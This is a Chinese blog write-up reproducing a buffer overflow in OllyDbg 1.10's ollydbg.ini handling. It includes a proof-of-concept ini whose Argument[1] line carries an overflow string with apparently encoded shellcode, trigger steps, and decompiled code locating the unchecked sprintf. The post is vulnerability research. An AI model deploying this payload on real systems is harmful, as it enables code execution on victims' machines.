OllyDBG ollydbg.ini 缓冲区溢出漏洞复现

闲来无事复现一个 ollydbg 的洞。

漏洞信息

漏洞可以在知道创宇的漏洞组件中找到

https://www.seebug.org/vuldb/ssvid-3876

不过它年代久远，里面的具体信息链接已经失效了，经过 google 发现了一个相关链接

http://arabteam2000-forum.com/index.php?/topic/168295-ollydbg-110-local-buffer-overflow-exploit/

这个页面貌似是中东那边的论坛，谷歌翻译勉强能看懂一点，幸好帖子中给出了关于这个漏洞的演示视频以及 payload，但是不包含详细的漏洞成因，出于好奇尝试对此漏洞进行分析。

漏洞复现

简单看了一下视频，加上给出的 POC 成功触发漏洞。其中 POC 如下

[Settings]
Check DLL versions = 0
Show toolbar =1
Status in toolbar =0
Use hardware breakpoints to step =0
Restore windows =1
Scroll MDI =0
Horizontal scroll =0
Topmost window =0
Index of default font =1
Index of default colours =0
Index of default syntax highlighting =0
Log buffer size index =0
Run trace buffer size index =1
Group adjacent commands in profile =1
Highlighted trace register =-1
IDEAL disassembling mode =0
Disassemble in lowercase =0
Separate arguments with TAB =0
Extra space between arguments =0
Show default segments =1
NEAR jump modifiers =0
Use short form of string commands =0
Use RET instead of RETN =0
Size sensitive mnemonics =1
SSE size decoding mode =0
Top of FPU stack =1
Always show memory size =1
Decode registers for any IP =0
Show symbolic addresses =1
Show local module names =1
Gray data used as filling =1
Show jump direction =1
Show jump path =0
Show jumpfrom path =0
Show path if jump is not taken =0
Underline fixups =1
Center FOLLOWed command =0
Show stack frames =1
Show local names in stack =1
Extended stack trace =0
Synchronize source with CPU =0
Include SFX extractor in code =0
SFX trace mode =0
Use real SFX entry from previous run =1
Ignore SFX exceptions =0
First pause =2
Stop on new DLL =0
Stop on DLL unload =0
Stop on new thread =0
Stop on thread end =0
Stop on debug string =0
Decode SSE registers =0
Enable last error =1
Ignore access violations in KERNEL32 =1
Ignore INT3 =0
Ignore TRAP =0
Ignore access violations =0
Step in unknown commands =0
Ignore division by 0 =0
Ignore illegal instructions =0
Ignore all FPU exceptions =0
Warn when frequent breaks =0
Warn when break not in code =1
Autoreturn =0
Save original command in trace =0
Show traced ESP =0
Show traced flags =0
Animate over system DLLs =0
Trace over string commands =0
Synchronize CPU and Run trace =0
Ignore custom exceptions =0
Smart update =1
Set high priority =1
Append arguments =1
Use ExitProcess =1
Allow injection to get WinProc =0
Sort WM_XXX by name =0
Type of last WinProc breakpoint =0
Snow-free drawing =0
Demangle symbolic names =0
Keep ordinal in name =1
Only ASCII printable in dump =0
Allow diacritical symbols =0
String decoding =3
Warn if not administrator =1
Warn when terminating process =1
Align dialogs =1
Use font of calling window =0
Specified dialog font =0
Number of lines that follow EIP =0
Restore window positions =1
Restore width of columns =0
Highlight sorted column =0
Compress analysis data =1
Backup UDD files =1
Fill rest of command with NOPs =1
Reference search mode =0
Global search =1
Aligned search =0
Allow error margin =0
Keep size of hex edit selection =1
Modify tag of FPU register =1
Hex inspector limits =1
MMX display mode =0
Last selected options card =0
Last selected appearance card =0
Ignore case in text search =1
Letter key in Disassembler =1
Looseness of code analysis =1
Decode pascal strings =1
Guess number of arguments =1
Accept far calls and returns =0
Accept direct segment modifications =0
Decode VxD calls =0
Accept privileged commands =0
Accept I/O commands =0
Accept NOPs =1
Accept shifts out of range =0
Accept superfluous prefixes =0
Accept LOCK prefixes =0
Accept unaligned stack operations =1
Accept non-standard command forms =1
Show ARG and LOCAL in procedures =0
Save analysis to file =1
Analyse main module automatically =1
Analyse code structure =1
Decode ifs as switches =0
Save trace to file =0
Trace contents of registers =1
Functions preserve registers =0
Decode tricks =0
Automatically select register type =0
Show decoded arguments =1
Show decoded arguments in stack =1
Show arguments in call stack =1
Show induced calls =1
Label display mode =0
Label includes module name =0
Highlight symbolic labels =0
Highlight RETURNs in stack =1
Ignore path in user data file =0
Ignore timestamp in user data file =1
Ignore CRC in user data file =0
Default sort mode in Names =1
Save out-of-module user data =0
Tabulate columns in log file =0
Append data to existing log file =0
Flush gathered data to log file =0
Skip spaces in source comments =1
Hide non-existing source files =0
Tab stops =8
File graph mode =2
Show internal handle names =0
Hide irrelevant handles =0


[History]
Executable[0] =C:\Users\lenovo\Desktop\baofeng.exe
View file = 
View text file = 
Object file = 
Import library = 
Log file =log.txt
Run trace file =rtrace.txt
API help file = 
Text save file = 
Symbolic data path =E:\my prog\Cracking Tools\odbg110
UDD path =C:\Users\lenovo\Desktop\ollydbg\ollydbg\UDD
Plugin path =C:\Users\lenovo\Desktop\ollydbg\ollydbg\plugin
Executable[1] =
Executable[2] = 
Executable[3] = 
Executable[4] = 
Executable[5] = 


[Arguments]
Executable[1] = 
Executable[2] = 
Executable[3] = 
Executable[4] = 
Executable[5] = 
Executable[0] = 
Argument[1] =""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA譿AAAAAAAAAAAAAAAA?Y?桫OIIIIIIQZVTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0ADTBDQB0ADAVX4Z8BDJOMNOJNFDBPB0BPKXE4N3KXNWE0JGA0ONK8OTJAKHO5BBAPKNIDKHFSKXAPPNA3BLIINJFXBLFWGPALLLM0APDLKNFOKCF5FBF0E7ENK8OUFBAPKNH6KHN0KTKXOENQA0KNKHNQK8APKNIHNUFBF0CLACBLF6K8BTB3EXBLJ7NPKXBDN0KXBGN1MJKHJVJ0KNIPKXBHBKB0BPB0KHJ6NCOUA3HOB6HUI8JOC8BLK7B5JVBOL8F0O5JVJYPOL8P0GUOOGNC6A6NVCVBPZ""
Argument[2] =sd
Argument[3] =vbn,
Argument[4] =fg
Argument[5] =sss
Argument[0] =溥嗜 琼 皂?


[Colours]
Scheme[0] =0,12,8,18,7,8,7,13
Scheme name[0] =Black on white
Scheme[1] =14,12,7,1,3,7,3,13
Scheme name[1] =Yellow on blue
Scheme[2] =1,12,3,11,14,2,7,13
Scheme name[2] =Marine
Scheme[3] =15,12,7,0,8,11,7,13
Scheme name[3] =Mostly black
Scheme[4] =0,12,8,18,7,8,7,13
Scheme name[4] =Scheme 4
Scheme[5] =14,12,7,1,3,7,3,13
Scheme name[5] =Scheme 5
Scheme[6] =1,12,3,11,14,2,7,13
Scheme name[6] =Scheme 6
Scheme[7] =15,12,7,0,8,11,7,13
Scheme name[7] =Scheme 7


[Fonts]
Font[0] =12,8,400,0,0,0,255,2,49,0
Face name[0] =Terminal
Font name[0] =OEM fixed font
Font[1] =9,6,700,0,0,0,255,0,48,1
Face name[1] =Terminal
Font name[1] =Terminal 6
Font[2] =15,8,400,0,0,0,178,2,49,0
Face name[2] =Fixedsys
Font name[2] =System fixed font
Font[3] =14,0,400,0,0,0,1,2,5,0
Face name[3] =Courier New
Font name[3] =Courier (UNICODE)
Font[4] =10,6,400,0,0,0,1,2,5,0
Face name[4] =Lucida Console
Font name[4] =Lucida (UNICODE)
Font[5] =9,6,700,0,0,0,255,0,48,0
Face name[5] =Terminal
Font name[5] =Font 5
Font[6] =15,8,400,0,0,0,178,2,49,0
Face name[6] =Fixedsys
Font name[6] =Font 6
Font[7] =14,0,400,0,0,0,1,2,5,0
Face name[7] =Courier New
Font name[7] =Font 7


[Syntax]
Commands[0] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[0] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[0] =No highlighting
Commands[1] =0,4,124,112,9,64,64,13,111,8,12,0,0,0
Operands[1] =1,0,4,13,65,1,112,6,0,0,0,0,0,0
Scheme name[1] =Christmas tree
Commands[2] =0,0,124,112,0,64,64,0,96,0,0,0,0,0
Operands[2] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[2] =Jumps'n'calls
Commands[3] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[3] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[3] =Hilite 3
Commands[4] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[4] =0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[4] =Hilite 4


[Plugin Command line]
Restore command line window = 0


[Plugin Bookmarks]
Restore bookmarks window = 0


[Placement]
OllyTest =486,83,640,480,1
CPU =0,0,514,366,3
CPU subwindows =529,1198,523,1198,320,649,282,649
CPU subwindows 1=374,767,336,658,450,960,388,853
CPU subwindows 2=374,767,336,658,450,960,388,853
CPU subwindows 3=374,767,336,658,450,960,388,853
CPU subwindows 4=374,767,336,658,450,960,388,853


[Appearance]
CPU scheme =0
CPU Disassembler =1,0,0,0,0
CPU Dump =1,0,1,0,4225,0
CPU Stack =1,0,0,0
CPU Info =1,0,0,0
CPU Registers =1,0,1,0


[Columns]
CPU Disassembler =54,102,240,1536
CPU Dump =54,144,54,
CPU Stack =54,60,1536,


[Plugin IDAFicator]
PATH_RADASM = C:\Users\lenovo\Desktop\ollydbg\ollydbg\plugin\minimalist-radasm
PATH_HELP = C:\Users\lenovo\Desktop\ollydbg\ollydbg\plugin\IDAFICATOR.hlp
DIA_CUSTOMIZE_SCHEME=0,8388608,32768,8421376,128,8388736,32896,12632256,8421504,16711680,65280,16776960,255,16711935,65535,16777215,12639424,15780004,15793151,10789024
SETTINGS_MAIN=0,0,0,0,0
SETTINGS_DUMP=
SETTINGS_DISASM=0,0,0
SETTINGS_STACK=
SETTINGS_HWBP=0,0,0
SETTINGS_ROTE=
LAYOUT_ID=0
LAYOUT_SWAP_DUMP_STACK=0


[Import libraries]
Implib[0] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42.Lib
Implib[1] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42d.Lib
Implib[2] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42u.Lib
Implib[3] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MFC42ud.Lib
Implib[4] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71.Lib
Implib[5] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71d.Lib
Implib[6] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71u.Lib
Implib[7] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc71ud.Lib
Implib[8] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc80d.Lib
Implib[9] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc80u.Lib
Implib[10] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfc80ud.Lib
Implib[11] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcd42d.Lib
Implib[12] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcd42ud.Lib
Implib[13] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcn42d.Lib
Implib[14] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcn42ud.Lib
Implib[15] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfco42d.Lib
Implib[16] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfco42ud.Lib
Implib[17] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\mfcn42ud.Lib
Implib[18] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MSVBVM50.lib
Implib[19] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvbvm60.lib
Implib[20] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcp60.lib
Implib[21] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcp71.lib
Implib[22] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcp80.lib
Implib[23] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\MSVCR70.lib
Implib[24] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcr71.lib
Implib[25] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcr80.lib
Implib[26] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\msvcrt.lib
Implib[27] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\comctl32.lib
Implib[28] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\dbgeng.lib
Implib[29] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\dbghelp.lib
Implib[30] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\kernel32.lib
Implib[31] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\ntdll.lib
Implib[32] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\oleaut32.lib
Implib[33] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\oledlg.lib
Implib[34] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\ollydbg.lib
Implib[35] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\ws2_32.lib
Implib[36] = C:\Users\lenovo\Desktop\ollydbg\ollydbg\LIB\wsock32.lib
[Plugin ODbgScript]
MRU1=
MRU2=
MRU3=
MRU4=
MRU5=
Restore Script window=0
Restore Script Log=0
[参数]
Argument[0]=1
[Plugin 中文搜索引擎]
Restore UStrRef Window=0

具体操作方法：

将 poc 命名为 ollydbg.ini，放在 OD 根目录下面(先备份好原先的文件)
修改 POC [History] 下面的 Executable[0] 参数，填写一个 exe 文件路径
启动原版 OD(如果你使用的是吾爱破解专用版，请打开根目录中的 OllyDBG.EXE)
选择 File ，点击刚刚填写的文件
点击 Debug 选项卡下面的 Arguments 选项，点击那串乱码的参数，点击确定

此时 OD 崩溃，成功触发了漏洞。

漏洞分析

根据视频中的提示，我们使用 IDA 打开 OD 主程序，漏洞主要在 sub_44150C 函数中。

反编译代码如下

INT_PTR __stdcall sub_44150C(HWND hDlg, UINT a2, WPARAM a3, LPARAM a4)
{
  signed int v4; // ebx@5
  signed int v5; // ebx@12
  signed int v6; // esi@12
  CHAR *v7; // edi@12
  CHAR *v8; // eax@14
  CHAR *v9; // edx@14
  char v10; // zf@15
  CHAR v11; // cl@17
  signed int v12; // ebx@25
  CHAR *v13; // edi@25
  const CHAR *v14; // edx@30
  INT_PTR result; // eax@4
  char v16[4096]; // [sp+0h] [bp-19204h]@28
  const CHAR *v17; // [sp+FF0h] [bp-18214h]@26
  CHAR ReturnedString[98304]; // [sp+1000h] [bp-18204h]@6
  CHAR KeyName; // [sp+19000h] [bp-204h]@6
  CHAR String; // [sp+19100h] [bp-104h]@23

  switch ( a2 )
  {
    case 0x110u: // WM_INITDIALOG
      SendDlgItemMessageA(hDlg, 4301, 0xCu, 0, &byte_4D5A7C);
      SendDlgItemMessageA(hDlg, 4302, 0x155u, 1u, 0);
      SendDlgItemMessageA(hDlg, 4302, 0x141u, 0xFFFu, 0);
      v4 = 0;
      do
      {
        sprintf(&KeyName, aArgumentI, v4);
        GetPrivateProfileStringA(aArguments, &KeyName, &a08lx_4[5], ReturnedString, 0x1000u, FileName);
        if ( ReturnedString[0] )
          SendDlgItemMessageA(hDlg, 4302, 0x143u, 0, ReturnedString);// get args from file then send them to textlist
        ++v4;
      }
      while ( v4 < 0x18 );
      SendDlgItemMessageA(hDlg, 4302, 0xCu, 0, &byte_4D5D88);
      result = 1;
      break;
    case 0x111u:
      if ( a3 == 1 )
      {
        SendDlgItemMessageA(hDlg, 4302, 0xDu, 0x1000u, &byte_4D5D88);
        if ( byte_4D5D88 )
        {
          v5 = 0;
          v6 = 0;
          v7 = ReturnedString;
          do
          {
            sprintf(&KeyName, aArgumentI, v5);
            GetPrivateProfileStringA(aArguments, &KeyName, &a08lx_4[5], &ReturnedString[4096 * v6], 0x1000u, FileName);
            if ( *v7 )
            {
              v8 = &ReturnedString[4096 * v6];
              v9 = &byte_4D5D88;
              do
              {
                v10 = *v8 == *v9;               // cmp arg[0] and args[current].
                if ( *v8 != *v9 )
                  break;
                if ( !*v8 )
                  goto LABEL_21;
                v11 = v8[1];
                v10 = v11 == v9[1];
                if ( v11 != v9[1] )
                  break;
                v8 += 2;
                v9 += 2;
                v10 = v11 == 0;
              }
              while ( v11 );
              if ( !v10 )
              {
                ++v6;
                v7 += 4096;
              }
            }
LABEL_21:
            ++v5;
          }
          while ( v5 < 0x18 );
          if ( byte_4D5D88 == '"' )
          {
            sprintf(&String, aS_9, &byte_4D5D88);
            WritePrivateProfileStringA(aArguments, aArgument0, &String, FileName);
          }
          else
          {
            WritePrivateProfileStringA(aArguments, aArgument0, &byte_4D5D88, FileName);
          }
          v12 = 1;
          v13 = ReturnedString;
          do
          {
            v17 = v12;
            sprintf(&KeyName, aArgumentI, v12);
            if ( v6 < v12 || *v13 != '"' )
            {
              v17 = FileName;
              if ( v6 < v12 )
                v14 = 0;
              else
                v14 = &v16[4096 * v12];
              WritePrivateProfileStringA(aArguments, &KeyName, v14, v17);
            }
            else
            {
              sprintf(&String, aS_9, &v16[4096 * v12]);// overflow?
              WritePrivateProfileStringA(aArguments, &KeyName, &String, FileName);
            }
            ++v12;
            v13 += 4096;
          }
          while ( v12 < 24 );
        }
        EndDialog(hDlg, 0);
      }
      else if ( a3 == 2 )
      {
        EndDialog(hDlg, -1);
      }
      result = 1;
      break;
    case 0x112u:
      if ( (a3 & 0xFFF0) == 0xF060 )
        EndDialog(hDlg, -1);
      result = 0;
      break;
    default:
      result = 0;
      break;
  }
  return result;
}

对函数查看交叉引用发现有另外一个函数调用了此函数

INT_PTR sub_441858()
{
  return DialogBoxParamA(hInstance, aDia_arguments, hWndClient, sub_44150C, 0);
}

原来它是一个对话框回调函数，用于处理对话框的消息。

我们主要关注存在漏洞的代码

do
          {
            v17 = v12;
            sprintf(&KeyName, aArgumentI, v12);
            if ( v6 < v12 || *v13 != '"' )
            {
              v17 = FileName;
              if ( v6 < v12 )
                v14 = 0;
              else
                v14 = &v16[4096 * v12];
              WritePrivateProfileStringA(aArguments, &KeyName, v14, v17);
            }
            else
            {
              sprintf(&String, aS_9, &v16[4096 * v12]);// overflow?
              WritePrivateProfileStringA(aArguments, &KeyName, &String, FileName);
            }
            ++v12;
            v13 += 4096;
          }
          while ( v12 < 24 );

此处会从第二个参数开始遍历，最外层是 do while 循环，循环 24 次处理所有参数。

第一个 if 处理两种情况

ini 中的参数没有全部处理完毕，并且当前处理的参数开头不是双引号
ini 中的参数处理完毕

第一种情况，会正常的取得参数在栈中的地址，然后重新写入 ini 文件。第二种情况把参数地址设置成 0，这样就不会更新 ini 文件了。

因此，当 ini 文件没有全部处理完毕，并且当前处理的参数还是以双引号开头的话，程序就会跑到 else 里面，这里的逻辑就很简单了，直接将参数用 sprintf 函数拷贝到另一个栈中的位置，然后再把它更新到 ini 文件中。

为什么要针对双引号情况单独处理呢？简单查找一下 GetPrivateProfileString 在 MSDN 的帮助页面发现如下描述

If the string associated with lpKeyName is enclosed in single or double quotation marks, the marks are discarded when the GetPrivateProfileString function retrieves the string.

如果目标参数的值被单引号或者双引号包裹，那么这些包裹字符将会被自动丢弃。

所以我猜测这里作者默认以双引号开头的参数为空参数，即 “” 这种形态，所以没有xxxx进一步限制参数长度。但是事实证明用户可以通过修改 ini 文件传入畸形的参数即 “”xxxx”” 这样四个双引号构成的字符串，最外层的引号被 API 自动过滤，但是内层还存在引号，并且参数不为空，依然可以进入 sprinf 逻辑中。

IDA 查看 String 参数距离栈底只有 0x104 字节，但是用户能够传入的字符串最大可以达到 0x1000 字节，显然会导致栈溢出。

论坛给出的 POC 是在 XP 下可用的，感兴趣的同学可以考虑构建一下 win7、win10 等系统的 POC。

要注意的是查看系统是否开启 DEP 数据执行保护，win 7 下默认只为系统进程和服务开启，第三方进程默认不开启，可以通过任务管理器进行查看。

虽然第三方程序不开启，但是执行 shellcode 的时候可能会访问到内核的一些数据，或者有其他的操作。不过我对 windows 漏洞利用不是很了解，暂时没有写出可用的POC。

此外，吾爱破解专用版 OD 也是存在这个问题的，只要是 OD 版本为 1.10 基本上都会受到影响，其中中文版 POC 如下

[History]
UDD path=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\UDD
Plugin path=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\plugin
View file=
View text file=
Object file=
Import library=
Log file=
Run trace file=rtrace.txt
API help file=
Text save file=
Symbolic data path=
Executable[1]=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\OllyDBG.EXE
Executable[2]=C:\Users\lenovo\Desktop\吾爱破解专用版Ollydbg\吾爱破解专用版Ollydbg\吾爱破解[LCG].exe
Executable[3]=C:\Users\lenovo\Desktop\1.exe
Executable[4]=C:\Users\lenovo\Desktop\reverse2_final.exe
Executable[5]=C:\Users\lenovo\Desktop\packed.exe
Executable[0]=C:\Users\lenovo\Desktop\ollydbg\ollydbg\OllyDBG.EXE
[Settings]
Check DLL versions=0
Show toolbar=1
Status in toolbar=1
Use hardware breakpoints to step=1
Restore windows=2193
Scroll MDI=0
Horizontal scroll=0
Topmost window=0
Index of default font=1
Index of default colours=0
Index of default syntax highlighting=0
Log buffer size index=0
Run trace buffer size index=1
Group adjacent commands in profile=1
Highlighted trace register=-1
IDEAL disassembling mode=0
Disassemble in lowercase=1
Separate arguments with TAB=0
Extra space between arguments=0
Show default segments=1
NEAR jump modifiers=0
Use short form of string commands=0
Use RET instead of RETN=0
Size sensitive mnemonics=1
SSE size decoding mode=0
Top of FPU stack=1
Always show memory size=1
Decode registers for any IP=1
Show symbolic addresses=1
Show local module names=1
Gray data used as filling=1
Show jump direction=1
Show jump path=1
Show jumpfrom path=1
Show path if jump is not taken=1
Underline fixups=1
Center FOLLOWed command=1
Show stack frames=1
Show local names in stack=1
Extended stack trace=1
Synchronize source with CPU=1
Include SFX extractor in code=0
SFX trace mode=0
Use real SFX entry from previous run=1
Ignore SFX exceptions=1
First pause=1
Stop on new DLL=0
Stop on DLL unload=0
Stop on new thread=0
Stop on thread end=0
Stop on debug string=0
Decode SSE registers=0
Enable last error=1
Ignore access violations in KERNEL32=1
Ignore INT3=1
Ignore TRAP=1
Ignore access violations=1
Step in unknown commands=1
Ignore division by 0=1
Ignore illegal instructions=1
Ignore all FPU exceptions=1
Warn when frequent breaks=0
Warn when break not in code=0
Autoreturn=0
Save original command in trace=1
Show traced ESP=1
Show traced flags=1
Animate over system DLLs=1
Trace over string commands=0
Synchronize CPU and Run trace=1
Ignore custom exceptions=1
Smart update=1
Set high priority=1
Append arguments=1
Use ExitProcess=1
Allow injection to get WinProc=0
Sort WM_XXX by name=0
Type of last WinProc breakpoint=0
Snow-free drawing=0
Demangle symbolic names=1
Keep ordinal in name=1
Only ASCII printable in dump=0
Allow diacritical symbols=0
String decoding=3
Warn if not administrator=0
Warn when terminating process=0
Align dialogs=1
Use font of calling window=0
Specified dialog font=0
Number of lines that follow EIP=0
Restore window positions=1
Restore width of columns=0
Highlight sorted column=0
Compress analysis data=1
Backup UDD files=1
Fill rest of command with NOPs=1
Reference search mode=0
Global search=1
Aligned search=1
Allow error margin=0
Keep size of hex edit selection=1
Modify tag of FPU register=1
Hex inspector limits=1
MMX display mode=0
Last selected options card=5
Last selected appearance card=3
Ignore case in text search=1
Letter key in Disassembler=1
Looseness of code analysis=1
Decode pascal strings=1
Guess number of arguments=1
Accept far calls and returns=1
Accept direct segment modifications=1
Decode VxD calls=1
Accept privileged commands=1
Accept I/O commands=1
Accept NOPs=1
Accept shifts out of range=1
Accept superfluous prefixes=1
Accept LOCK prefixes=1
Accept unaligned stack operations=1
Accept non-standard command forms=1
Show ARG and LOCAL in procedures=1
Save analysis to file=1
Analyse main module automatically=1
Analyse code structure=1
Decode ifs as switches=1
Save trace to file=0
Trace contents of registers=1
Functions preserve registers=0
Decode tricks=1
Automatically select register type=1
Show decoded arguments=1
Show decoded arguments in stack=1
Show arguments in call stack=1
Show induced calls=1
Label display mode=0
Label includes module name=1
Highlight symbolic labels=1
Highlight RETURNs in stack=1
Ignore path in user data file=1
Ignore timestamp in user data file=1
Ignore CRC in user data file=1
Default sort mode in Names=1
Save out-of-module user data=0
Tabulate columns in log file=0
Append data to existing log file=0
Flush gathered data to log file=0
Skip spaces in source comments=1
Hide non-existing source files=1
Tab stops=8
File graph mode=2
Show internal handle names=0
Hide irrelevant handles=0
[Plugin ODbgScript]
Restore Script window=0
Restore Script Log=0
BP_0001=
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
还原脚本窗口=0
还原脚本日志=0
MRU1=C:\Users\lenovo\Desktop\od.txt
MRU2=
MRU3=
MRU4=
MRU5=
ScriptDir=C:\Users\lenovo\Desktop\od.txt
BP_FILE=C:\Users\lenovo\Desktop\od.txt
[System]
Options position=134,126
Call DLL position=20,89
[Plugin IDAFicator]
Custom Scheme=0,8388608,32768,8421376,128,8388736,32896,12632256,8421504,16711680,65280,16776960,255,16711935,65535,16777215,12639424,15780004,15793151,10789024
disableClickJmp=1
DIA MAC x=0
DIA MAC y=0
DIA HWBP x=0
DIA HWBP y=0
Custom BP list=NonaWrite
disasmCode=0
PATH_RADASM=C:\吾爱破解专用版Ollydbg\plugin\minimalist-radasm
PATH_HELP=C:\吾爱破解专用版Ollydbg\plugin\IDAFICATOR.hlp
SETTINGS_MSEC=500
DIA_CUSTOMIZE_SCHEME=0,8388608,32768,8421376,128,8388736,32896,12632256,8421504,16711680,65280,16776960,255,16711935,65535,16777215,12639424,15780004,15793151,10789024
SETTINGS_MAIN=1,1,1,1,1
SETTINGS_DUMP=
SETTINGS_DISASM=1,0,0
SETTINGS_STACK=
SETTINGS_HWBP=0,0,0
SETTINGS_ROTE=
LAYOUT_ID=0
LAYOUT_SWAP_DUMP_STACK=0
SETTINGS_COMPILER=0
DIA_ROTE_POS=-4,-4,1032,746
MNU_PATHS_DIRS_N=0
MNU_PATHS_FILES_N=0
[Plugin 超级字串参考]
Restore UStrRef Window=1
[Placement]
OllyTest=434,64,1219,623,1
CPU=35,302,1027,472,3
CPU subwindows=601,1459,595,1459,583,1155,518,1179
超级字串参考=22,29,618,230,1
Executable modules=0,0,162,45,1
Memory map=0,0,162,45,1
Log data=282,17,312,45,1
Threads=0,0,162,45,1
Windows=0,0,162,45,1
Handles=132,16,547,437,1
Patches=278,0,312,45,1
Call stack=137,16,312,45,1
Source=44,58,372,274,1
References=0,0,162,45,1
Breakpoints=0,0,162,45,1
中文搜索引擎=278,38,312,57,1
Call tree=0,0,312,45,1
脚本运行窗口=193,89,201,45,1
Watch expressions=99,37,540,230,1
Source files=66,87,474,230,1
Run trace=22,29,432,230,1
SEH chain=88,116,270,230,1
CPU subwindows 1=374,767,336,658,450,960,388,853
CPU subwindows 2=374,767,336,658,450,960,388,853
CPU subwindows 3=374,767,336,658,450,960,388,853
CPU subwindows 4=374,767,336,658,450,960,388,853
[Colours]
Scheme[0]=10,12,18,0,5,15,13,13
Scheme name[0]=Dave's black
Scheme[1]=1,5,0,18,7,18,4,12
Scheme name[1]=Fancy Nico
Scheme[2]=7,12,7,10,11,7,3,13
Scheme name[2]=Kostya's blue
Scheme[3]=7,12,7,0,5,15,18,13
Scheme name[3]=Dami's black
Scheme[4]=0,12,8,18,7,8,7,13
Scheme name[4]=Scheme 4
Scheme[5]=14,12,7,1,3,7,3,13
Scheme name[5]=Scheme 5
Scheme[6]=1,12,3,11,14,2,7,13
Scheme name[6]=Scheme 6
Scheme[7]=15,12,7,0,8,11,7,13
Scheme name[7]=Scheme 7
[Fonts]
Font[0]=16,8,400,0,0,0,134,2,49,0
Face name[0]=Terminal
Font name[0]=OEM 等宽字体
Font[1]=-12,0,400,0,0,0,134,1,49,0
Face name[1]=新宋体
Font name[1]=Terminal 6
Font[2]=16,8,400,0,0,0,134,2,49,0
Face name[2]=Fixedsys
Font name[2]=系统等宽字体
Font[3]=14,0,400,0,0,0,1,2,5,0
Face name[3]=Courier New
Font name[3]=Courier (UNICODE)
Font[4]=10,6,400,0,0,0,1,2,5,0
Face name[4]=Lucida Console
Font name[4]=Lucida (UNICODE)
Font[5]=9,6,700,0,0,0,255,0,48,0
Face name[5]=Terminal
Font name[5]=字体 5
Font[6]=16,8,400,0,0,0,134,2,49,0
Face name[6]=Fixedsys
Font name[6]=字体 6
Font[7]=14,0,400,0,0,0,1,2,5,0
Face name[7]=Courier New
Font name[7]=字体 7
[Syntax]
Commands[1]=10,7,12,12,14,12,12,13,96,7,14,0,0,0
Operands[1]=1,7,7,7,13,14,10,11,0,0,0,0,0,0
Scheme name[1]=Dave
Commands[2]=1,1,1,1,1,1,1,4,109,12,12,0,0,0
Operands[2]=1,1,2,4,12,2,2,5,0,0,0,0,0,0
Scheme name[2]=Fancy Nico
Commands[3]=14,4,124,124,9,110,64,13,111,8,12,0,0,0
Operands[3]=1,10,4,13,11,13,15,6,0,0,0,0,0,0
Scheme name[3]=Kostya's xmas tree
Commands[4]=7,7,2,12,6,12,10,13,96,7,14,0,0,0
Operands[4]=1,7,7,7,13,7,10,11,0,0,0,0,0,0
Scheme name[4]=Dami
Commands[5]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[5]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
